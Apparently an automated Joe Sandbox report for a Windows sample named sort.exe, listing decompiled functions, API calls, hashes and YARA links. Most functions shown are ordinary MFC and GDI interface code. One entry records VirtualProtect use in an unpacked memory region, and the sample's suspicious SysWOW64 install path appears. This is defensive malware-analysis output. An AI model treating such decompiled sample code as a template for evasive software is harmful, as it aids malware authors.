Instruction Fuzzy Hash: C001AD71A00118BFCB10AFA4EC84CDE7BBDEF04368B50416AB554960A0CB74AE828BA4

Uniqueness

Uniqueness Score: -1.00%

Function 004159DA, Relevance: 6.0, APIs: 4, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004159DA(struct HDC__* _a4, struct HWND__* _a8, intOrPtr _a12, void* _a16, long _a20) {
				long _v12;
				void _v16;
				intOrPtr _t12;
				long _t16;
				void* _t18;

				if(_a4 == 0 || _a16 == 0) {
					L10:
					return 0;
				} else {
					_t12 = _a12;
					if(_t12 == 1 || _t12 == 0 || _t12 == 5 || _t12 == 2 && E0041A759(_a8, _t12) == 0) {
						goto L10;
					} else {
						GetObjectA(_a16, 0xc,  &_v16);
						SetBkColor(_a4, _v12);
						_t16 = _a20;
						if(_t16 == 0xffffffff) {
							_t16 = GetSysColor(8);
						}
						SetTextColor(_a4, _t16);
						_t18 = 1;
						return _t18;
					}
				}
			}

APIs

GetObjectA.GDI32(00000000,0000000C,?), ref: 00415A18
SetBkColor.GDI32(00000000,00000000), ref: 00415A24
GetSysColor.USER32(00000008), ref: 00415A34
SetTextColor.GDI32(00000000,?), ref: 00415A3E

Part of subcall function 0041A759: GetWindowLongA.USER32 ref: 0041A76A

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: Color$LongObjectTextWindow
String ID:
API String ID: 2871169696-0
Opcode ID: 4ad30bffaeaffe627c47a10de67731051e8ff583e855d0137c1ba5dc160fcdf3
Instruction ID: 5794cb577ca1faeaf387d8a9650f772c60ab8f78b3a0630a70f1c9da6bb06112
Opcode Fuzzy Hash: 4ad30bffaeaffe627c47a10de67731051e8ff583e855d0137c1ba5dc160fcdf3
Instruction Fuzzy Hash: A1012830140609EFDF219FA4DD89BEB3B69EF80380F584622F912D41E0C774C9E5DA99

Uniqueness

Uniqueness Score: -1.00%

Function 00423A6F, Relevance: 6.0, APIs: 4, Instructions: 43
windowCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00423A6F(void* __ecx) {
				void* __esi;
				void* _t16;
				void* _t28;
				void* _t30;
				intOrPtr _t32;
				intOrPtr _t34;

				E00406520(E0042A9EC, _t30);
				_push(__ecx);
				_push(__ecx);
				_t34 =  *0x439c44; // 0x1
				 *((intOrPtr*)(_t30 - 0x10)) = _t32;
				_t28 = __ecx;
				if(_t34 == 0) {
					 *((intOrPtr*)(_t30 - 4)) = 0;
					if( *(_t30 + 0xc) != 0) {
						lstrcpyA(E00416D38(_t28 + 0xc8, lstrlenA( *(_t30 + 0xc))),  *(_t30 + 0xc));
					} else {
						E00416A77(__ecx + 0xc8, __ecx);
					}
					SendMessageA( *(_t28 + 0x1c), 0x85, 0, 0);
					_t16 = 1;
				} else {
					_t16 = E004136A7(__ecx);
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t30 - 0xc));
				return _t16;
			}

APIs

__EH_prolog.LIBCMT ref: 00423A74
SendMessageA.USER32(?,00000085,00000000,00000000), ref: 00423AD2

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: H_prologMessageSend
String ID:
API String ID: 2337391251-0
Opcode ID: 4ca917c012f4fcbbd9e78dea033b59e07bb3dc9b9d14554c59375adacc446899
Instruction ID: 2aa457cf7095c193361f5c786731192497787529c17009fc52bec87f436ac3b9
Opcode Fuzzy Hash: 4ca917c012f4fcbbd9e78dea033b59e07bb3dc9b9d14554c59375adacc446899
Instruction Fuzzy Hash: 52018F72600210FECB219F52EC09AAF7B78FF94316F50853FF05655050CB795A42CB69

Uniqueness

Uniqueness Score: -1.00%

Function 004297EF, Relevance: 6.0, APIs: 4, Instructions: 39
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004297EF(void* __ecx) {
				struct tagPOINT _v12;
				struct tagPOINT _v20;
				struct HDC__* _t19;

				_t19 =  *(__ecx + 8);
				if(_t19 != 0 &&  *(__ecx + 4) != 0) {
					GetViewportOrgEx(_t19,  &_v12);
					E004298F1(__ecx,  &_v12);
					_v12.y = _v12.y +  *((intOrPtr*)(__ecx + 0x24));
					_v12.x = _v12.x +  *((intOrPtr*)(__ecx + 0x20));
					SetViewportOrgEx( *(__ecx + 4), _v12, _v12.y, 0);
					GetWindowOrgEx( *(__ecx + 8),  &_v20);
					return SetWindowOrgEx( *(__ecx + 4), _v20, _v20.y, 0);
				}
				return _t19;
			}

0x004297f8
0x004297fd
0x0042980a
0x00429816
0x00429821
0x00429824
0x00429832
0x0042983f
0x00000000
0x00429850
0x00429858

APIs

GetViewportOrgEx.GDI32(?,?), ref: 0042980A

Part of subcall function 004298F1: GetViewportExtEx.GDI32(?,?,?,?,?,0042981B,?), ref: 00429902
Part of subcall function 004298F1: GetWindowExtEx.GDI32(?,?,?,?,?,0042981B,?), ref: 0042990F

SetViewportOrgEx.GDI32(00000000,?,00000000,00000000), ref: 00429832
GetWindowOrgEx.GDI32(?,?), ref: 0042983F
SetWindowOrgEx.GDI32(00000000,?,?,00000000), ref: 00429850

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: ViewportWindow
String ID:
API String ID: 1589084482-0
Opcode ID: 9cb27b9576bff162c776de5092b62e69a93abe33db6f5d663133d7bfa2b1e625
Instruction ID: c39a85c19b382e653cd8ba5d99ea89e37b71820b7245054109fbca8261a50672
Opcode Fuzzy Hash: 9cb27b9576bff162c776de5092b62e69a93abe33db6f5d663133d7bfa2b1e625
Instruction Fuzzy Hash: CE018B31A00219EFDF21AB94DC09EAEBBB9FF08300F44446DF552A2160D730AA10DB48

Uniqueness

Uniqueness Score: -1.00%

Function 00423946, Relevance: 6.0, APIs: 4, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 38%

			E00423946(intOrPtr* __eax, void* __ebx, struct tagRECT* _a5, intOrPtr _a9) {
				int _t13;
				int _t14;
				void* _t18;
				signed int _t20;
				struct tagRECT* _t24;

				asm("pushfd");
				 *__eax =  *__eax + __eax;
				if( *__eax == 0) {
					_t20 = E00416528(_t18);
					if((_t20 & 0x00040600) == 0) {
						_push(GetSystemMetrics(6));
						_push(5);
					} else {
						_push(GetSystemMetrics(0x21));
						_push(0x20);
					}
					_t13 = GetSystemMetrics();
					_t24 = _a5;
					_t14 = InflateRect(_t24, _t13, ??);
					if((_t20 & 0x00c00000) != 0) {
						_t14 =  *0x439c9c; // 0x0
						_t24->top = _t24->top - _t14;
					}
				} else {
					_t14 = E00415361(_t18, _a5, _a9);
				}
				return _t14;
			}

APIs

GetSystemMetrics.USER32 ref: 00423975
GetSystemMetrics.USER32 ref: 00423989
InflateRect.USER32(?,00000000), ref: 00423991

Part of subcall function 00415361: AdjustWindowRectEx.USER32(?,00000000,00000000,00000000), ref: 00415382

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: MetricsRectSystem$AdjustInflateWindow
String ID:
API String ID: 4080371637-0
Opcode ID: 478b58855d32e14134a02de9518b8f521cec39634a60b9e5a7c6a0ca6cd3883b
Instruction ID: 476433383503efba52e9924e6e49c42754f463986d7ec7af0d6b2631c1f39b91
Opcode Fuzzy Hash: 478b58855d32e14134a02de9518b8f521cec39634a60b9e5a7c6a0ca6cd3883b
Instruction Fuzzy Hash: 6FF0F672644320BFD2115B94BC04B6B7F74DF82721F46401BB94857250C6AC9D91CB9B

Uniqueness

Uniqueness Score: -1.00%

Function 00422D9C, Relevance: 6.0, APIs: 4, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E00422D9C(struct tagRECT* _a8) {
				signed int _t11;
				int _t13;
				intOrPtr _t14;
				void* _t18;
				signed int _t20;
				struct tagRECT* _t23;

				if( *0x439c44 != 0) {
					return E004136A7(_t18);
				}
				_t20 = E00416528(_t18);
				if((_t20 & 0x00040600) == 0) {
					_push( ~(GetSystemMetrics(6)));
					_push(5);
				} else {
					_push( ~(GetSystemMetrics(0x21)));
					_push(0x20);
				}
				_t11 = GetSystemMetrics();
				_t23 = _a8;
				_t13 = InflateRect(_t23,  ~_t11, ??);
				if((_t20 & 0x00c00000) != 0) {
					_t14 =  *0x439c9c; // 0x0
					_t23->top = _t23->top + _t14;
					return _t14;
				}
				return _t13;
			}

APIs

GetSystemMetrics.USER32 ref: 00422DC5
GetSystemMetrics.USER32 ref: 00422DDD
InflateRect.USER32(?,00000000), ref: 00422DE7

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: MetricsSystem$InflateRect
String ID:
API String ID: 437325472-0
Opcode ID: 6060918641cc2463bec1deac6ee1b13bf6bfdcc09788a2bc1d355cc03caae5fb
Instruction ID: 4fb92264d37d23bc1c26475d3dc17a881ebb7d940131a89487b38c95dcd350b0
Opcode Fuzzy Hash: 6060918641cc2463bec1deac6ee1b13bf6bfdcc09788a2bc1d355cc03caae5fb
Instruction Fuzzy Hash: DBF02E32740334BFE221ABA4BD00B7B3355DF40B14F56002BF909A7284CBE86C418BAE

Uniqueness

Uniqueness Score: -1.00%

Function 0041A843, Relevance: 6.0, APIs: 4, Instructions: 29
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041A843(struct HWND__* _a4, CHAR* _a8) {
				char _v260;
				int _t14;
				int _t15;

				_t15 = lstrlenA(_a8);
				if(_t15 > 0x100 || GetWindowTextA(_a4,  &_v260, 0x100) != _t15) {
					L3:
					return SetWindowTextA(_a4, _a8);
				}
				_t14 = lstrcmpA( &_v260, _a8);
				if(_t14 != 0) {
					goto L3;
				}
				return _t14;
			}

0x0041a856
0x0041a85f
0x0041a88a
0x00000000
0x0041a890
0x0041a880
0x0041a888
0x00000000
0x00000000
0x0041a898

APIs

lstrlenA.KERNEL32(?,00000800), ref: 0041A850
GetWindowTextA.USER32 ref: 0041A86C
lstrcmpA.KERNEL32(?,?), ref: 0041A880
SetWindowTextA.USER32(00000104,?), ref: 0041A890

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: TextWindow$lstrcmplstrlen
String ID:
API String ID: 330964273-0
Opcode ID: 1cfb4ac0c6899b474dfd1d84c176643e54bd71b72646a20d8addbcc5a2558e60
Instruction ID: c3fc7a8564519c1884d43f76098dd6529aba3a828980642d919d20382e6303d7
Opcode Fuzzy Hash: 1cfb4ac0c6899b474dfd1d84c176643e54bd71b72646a20d8addbcc5a2558e60
Instruction Fuzzy Hash: FFF05831600018ABCF32AF24DC08ADEBB6CFB18391F048172FC5AD1160D775CAA6CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00420031, Relevance: 6.0, APIs: 4, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00420031(void* __ecx, void* __eflags) {
				signed int _t9;
				int _t10;
				void* _t12;
				void* _t13;
				signed int* _t14;
				void* _t15;

				_t13 = __ecx;
				E0042007A(__ecx, __eflags, 1);
				ReleaseCapture();
				_t12 = E00413740(_t15, GetDesktopWindow());
				LockWindowUpdate(0);
				_t9 =  *(_t13 + 0x84);
				_t14 = _t13 + 0x84;
				if(_t9 != 0) {
					_t10 = ReleaseDC( *(_t12 + 0x1c),  *(_t9 + 4));
					 *_t14 =  *_t14 & 0x00000000;
					return _t10;
				}
				return _t9;
			}

0x00420033
0x00420037
0x0042003c
0x00420050
0x00420052
0x00420058
0x0042005e
0x00420066
0x0042006e
0x00420074
0x00000000
0x00420074
0x00420079

APIs

Part of subcall function 0042007A: GetStockObject.GDI32(00000000), ref: 00420090
Part of subcall function 0042007A: InflateRect.USER32(?,000000FF,000000FF), ref: 00420134

ReleaseCapture.USER32(00000001,745EA0A0,?,00420430,00000000), ref: 0042003C
GetDesktopWindow.USER32 ref: 00420042
LockWindowUpdate.USER32(00000000,00000000,?,00420430,00000000), ref: 00420052
ReleaseDC.USER32 ref: 0042006E

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: ReleaseWindow$CaptureDesktopInflateLockObjectRectStockUpdate
String ID:
API String ID: 1260764132-0
Opcode ID: 423f5da81c9821fbb59232a2df5f391de1bc3aff17169a30eddc45f67e9bdea0
Instruction ID: aa72cfc852c6b525c97a93d2fef73d5ebb0a3ecfc5ad3a3ec9de28fd496f1bdc
Opcode Fuzzy Hash: 423f5da81c9821fbb59232a2df5f391de1bc3aff17169a30eddc45f67e9bdea0
Instruction Fuzzy Hash: D0E0D8313003119BE7206B71FC0DB557BA4FF40791F494035F944C61B1CB78A842CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00406D64, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 124
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E00406D64(void* __ebx, void* __edi) {
				char _v17;
				signed char _v18;
				struct _cpinfo _v24;
				char _v280;
				char _v536;
				char _v792;
				char _v1304;
				void* _t43;
				char _t44;
				signed char _t45;
				void* _t55;
				signed int _t56;
				signed char _t64;
				intOrPtr* _t66;
				signed int _t68;
				signed int _t70;
				signed int _t71;
				signed char _t76;
				signed char _t77;
				signed char* _t78;
				void* _t81;
				void* _t87;
				void* _t88;

				if(GetCPInfo( *0x43b640,  &_v24) == 1) {
					_t44 = 0;
					do {
						 *((char*)(_t87 + _t44 - 0x114)) = _t44;
						_t44 = _t44 + 1;
					} while (_t44 < 0x100);
					_t45 = _v18;
					_v280 = 0x20;
					if(_t45 == 0) {
						L9:
						E0040A040(1,  &_v280, 0x100,  &_v1304,  *0x43b640,  *0x43b864, 0);
						E00409DEA( *0x43b864, 0x100,  &_v280, 0x100,  &_v536, 0x100,  *0x43b640, 0);
						E00409DEA( *0x43b864, 0x200,  &_v280, 0x100,  &_v792, 0x100,  *0x43b640, 0);
						_t55 = 0;
						_t66 =  &_v1304;
						do {
							_t76 =  *_t66;
							if((_t76 & 0x00000001) == 0) {
								if((_t76 & 0x00000002) == 0) {
									 *(_t55 + 0x43b660) =  *(_t55 + 0x43b660) & 0x00000000;
									goto L16;
								}
								 *(_t55 + 0x43b761) =  *(_t55 + 0x43b761) | 0x00000020;
								_t77 =  *((intOrPtr*)(_t87 + _t55 - 0x314));
								L12:
								 *(_t55 + 0x43b660) = _t77;
								goto L16;
							}
							 *(_t55 + 0x43b761) =  *(_t55 + 0x43b761) | 0x00000010;
							_t77 =  *((intOrPtr*)(_t87 + _t55 - 0x214));
							goto L12;
							L16:
							_t55 = _t55 + 1;
							_t66 = _t66 + 2;
						} while (_t55 < 0x100);
						return _t55;
					}
					_t78 =  &_v17;
					do {
						_t68 =  *_t78 & 0x000000ff;
						_t56 = _t45 & 0x000000ff;
						if(_t56 <= _t68) {
							_t81 = _t87 + _t56 - 0x114;
							_t70 = _t68 - _t56 + 1;
							_t71 = _t70 >> 2;
							memset(_t81 + _t71, memset(_t81, 0x20202020, _t71 << 2), (_t70 & 0x00000003) << 0);
							_t88 = _t88 + 0x18;
						}
						_t78 =  &(_t78[2]);
						_t45 =  *((intOrPtr*)(_t78 - 1));
					} while (_t45 != 0);
					goto L9;
				}
				_t43 = 0;
				do {
					if(_t43 < 0x41 || _t43 > 0x5a) {
						if(_t43 < 0x61 || _t43 > 0x7a) {
							 *(_t43 + 0x43b660) =  *(_t43 + 0x43b660) & 0x00000000;
						} else {
							 *(_t43 + 0x43b761) =  *(_t43 + 0x43b761) | 0x00000020;
							_t64 = _t43 - 0x20;
							goto L22;
						}
					} else {
						 *(_t43 + 0x43b761) =  *(_t43 + 0x43b761) | 0x00000010;
						_t64 = _t43 + 0x20;
						L22:
						 *(_t43 + 0x43b660) = _t64;
					}
					_t43 = _t43 + 1;
				} while (_t43 < 0x100);
				return _t43;
			}

APIs

GetCPInfo.KERNEL32(?,00000000), ref: 00406D78

Strings

, xrefs: 00406DC1
, xrefs: 00406D9D

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: Info
String ID: $
API String ID: 1807457897-3032137957
Opcode ID: 1ede330d16080c1c95d27d4bf0c3672f6aaaf0e2f94890a87c5ee2107f815b63
Instruction ID: 0991ebd0fa5129877e21a5118ab4003fa57d8a1e05bbe212390e33009e0f709d
Opcode Fuzzy Hash: 1ede330d16080c1c95d27d4bf0c3672f6aaaf0e2f94890a87c5ee2107f815b63
Instruction Fuzzy Hash: 6B4137311042AC5AEB119B14CD4ABEB3B99DB12704F1914F6D28AE61E3C3394964C7EA

Uniqueness

Uniqueness Score: -1.00%

Function 00414354, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E00414354(void* __ecx, int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				struct _WNDCLASSA _v44;
				void* __ebp;
				void* _t27;
				void* _t36;
				intOrPtr _t40;
				struct HINSTANCE__* _t46;
				CHAR* _t50;

				E00425FC6(1);
				E004067EC(0, 0);
				_push(0);
				_t50 = E004249C4() + 0x58;
				_t27 = E00424BFB();
				_t40 = _a8;
				_t46 =  *(_t27 + 8);
				if(_t40 != 0 || _a12 != _t40 || _a16 != _t40) {
					wsprintfA(_t50, "Afx:%x:%x:%x:%x:%x", _t46, _a4, _t40, _a12, _a16);
				} else {
					wsprintfA(_t50, "Afx:%x:%x", _t46, _a4);
				}
				if(GetClassInfoA(_t46, _t50,  &_v44) == 0) {
					_v44.style = _a4;
					_v44.lpfnWndProc = DefWindowProcA;
					_v44.cbWndExtra = 0;
					_v44.cbClsExtra = 0;
					_v44.lpszMenuName = 0;
					_v44.hIcon = _a16;
					_push( &_v44);
					_v44.hInstance = _t46;
					_v44.hCursor = _t40;
					_v44.hbrBackground = _a12;
					_v44.lpszClassName = _t50;
					_t36 = E004142C3();
					_t65 = _t36;
					if(_t36 == 0) {
						E0041A6C8(_t65);
					}
				}
				return _t50;
			}

APIs

Part of subcall function 00425FC6: LeaveCriticalSection.KERNEL32(?,00425D5F,00000010,00000010,?,00000000,?,?,?,00424C20,00424C6D,0042440D,00424C26,00412700,0041843C), ref: 00425FDE

Part of subcall function 004067EC: RaiseException.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00406468,00000000), ref: 0040681A

wsprintfA.USER32 ref: 0041439A
wsprintfA.USER32 ref: 004143B6
GetClassInfoA.USER32 ref: 004143C5

Strings

Afx:%x:%x, xrefs: 00414394

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: wsprintf$ClassCriticalExceptionInfoLeaveRaiseSection
String ID: Afx:%x:%x
API String ID: 2529146597-2071556601
Opcode ID: d77d54e2a205c26894113d0f98cb3835fbc2923fa6b7d860ecab1e58f07b156b
Instruction ID: 12ef8f29c3e1d770b63201246022492823754bba1a77f7a68e39ab1c72f0dc03
Opcode Fuzzy Hash: d77d54e2a205c26894113d0f98cb3835fbc2923fa6b7d860ecab1e58f07b156b
Instruction Fuzzy Hash: 99113370B002199FDB10EFA5D8819DF7BB8EF48354B54402BF914E3241E3789A918BA9

Uniqueness

Uniqueness Score: -1.00%

Function 02242430, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,00000040,00000004,?), ref: 02242468
VirtualProtect.KERNEL32(00000000,000000F8,00000004,?), ref: 022424B2

Strings

@, xrefs: 02242453

Memory Dump Source

Source File: 00000001.00000002.931652161.0000000002241000.00000020.00000001.sdmp, Offset: 02241000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2241000_sort.jbxd

Similarity

API ID: ProtectVirtual
String ID: @
API String ID: 544645111-2766056989
Opcode ID: 839606eb055d731431a6a737fc42085fb5568c9959f9e7d7939c70df2301a622
Instruction ID: 411086ac21d9d8bbf948621cbd88d2c9ddd44c86da8dcea3a3a6c35fd5bfd71a
Opcode Fuzzy Hash: 839606eb055d731431a6a737fc42085fb5568c9959f9e7d7939c70df2301a622
Instruction Fuzzy Hash: 8A21D8B4D10209EFDB18CFD5C984BAEBBB5FF44304F608699E905AB244CB74AA40DB55

Uniqueness

Uniqueness Score: -1.00%

Function 004092BC, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E004092BC() {
				signed int _v8;
				char _v12;
				CHAR* _t14;
				intOrPtr _t27;
				CHAR* _t37;
				intOrPtr _t41;
				intOrPtr _t46;

				_push(_t33);
				_t46 =  *0x43b86c; // 0x1
				if(_t46 == 0) {
					E00406EE9();
				}
				GetModuleFileNameA(0, 0x439dd0, 0x104);
				_t14 =  *0x43b87c; // 0x4b3360
				 *0x439d24 = 0x439dd0;
				_t37 = 0x439dd0;
				if( *_t14 != 0) {
					_t37 = _t14;
				}
				E00409355(_t37, 0, 0,  &_v8,  &_v12);
				_t41 = E00405667(_v12 + _v8 * 4);
				if(_t41 == 0) {
					E00406490(8);
				}
				E00409355(_t37, _t41, _t41 + _v8 * 4,  &_v8,  &_v12);
				_t27 = _v8 - 1;
				 *0x439d0c = _t41;
				 *0x439d08 = _t27;
				return _t27;
			}

0x004092c0
0x004092c4
0x004092cc
0x004092ce
0x004092ce
0x004092df
0x004092e5
0x004092ea
0x004092f0
0x004092f4
0x004092f6
0x004092f6
0x00409303
0x00409317
0x0040931e
0x00409322
0x00409327
0x00409339
0x00409344
0x00409345
0x0040934d
0x00409354

APIs

GetModuleFileNameA.KERNEL32(00000000,C:\Windows\SysWOW64\setupugc\sort.exe,00000104,?,00000000,?,?,?,?,00406428), ref: 004092DF

Strings

`3K, xrefs: 004092E5
C:\Windows\SysWOW64\setupugc\sort.exe, xrefs: 004092D3, 004092DD, 00409302, 00409338

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: FileModuleName
String ID: C:\Windows\SysWOW64\setupugc\sort.exe$`3K
API String ID: 514040917-1816137438
Opcode ID: 0f5333ee8a2dff6588455ba644662dd6d7049445c33136eb525253b45858dde5
Instruction ID: 4b94aae2b44b8e024f3e9ff9f5f305e43beb143c307f02a5dedadab18630ac66
Opcode Fuzzy Hash: 0f5333ee8a2dff6588455ba644662dd6d7049445c33136eb525253b45858dde5
Instruction Fuzzy Hash: DB1151B2900108BFD711EF95DC81CDF77ACDB49758B0500BBF905A3281D674AE00CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 0040E0CD, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E0040E0CD(intOrPtr __ecx) {
				void* _t30;
				void* _t33;

				E00406520(E0042AD9C, _t30);
				_push(__ecx);
				_push(__ecx);
				 *((intOrPtr*)(_t30 - 0x14)) = __ecx;
				 *((intOrPtr*)(_t30 - 0x10)) = 0x42e428;
				E0040F44C(__ecx, _t33, _t30 - 0x10);
				 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
				 *((char*)(__ecx + 0xc)) =  *((intOrPtr*)( *((intOrPtr*)(_t30 + 8))));
				E00401AE0(__ecx + 0xc, 0);
				E00402320(__ecx + 0xc,  *((intOrPtr*)(_t30 + 8)), 0,  *0x42b7d8);
				 *((intOrPtr*)(__ecx)) = 0x42f884;
				 *[fs:0x0] =  *((intOrPtr*)(_t30 - 0xc));
				return __ecx;
			}

0x0040e0d2
0x0040e0d7
0x0040e0d8
0x0040e0e2
0x0040e0e5
0x0040e0ec
0x0040e0f4
0x0040e101
0x0040e103
0x0040e113
0x0040e11b
0x0040e126
0x0040e12e

APIs

__EH_prolog.LIBCMT ref: 0040E0D2

Strings

string too long, xrefs: 0040E0DA
(B, xrefs: 0040E0E5

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: H_prolog
String ID: (B$string too long
API String ID: 3519838083-213930478
Opcode ID: f03796f0994221b19e597dc6b348fa6f620dcfc84c8546b3792d48647d6ad245
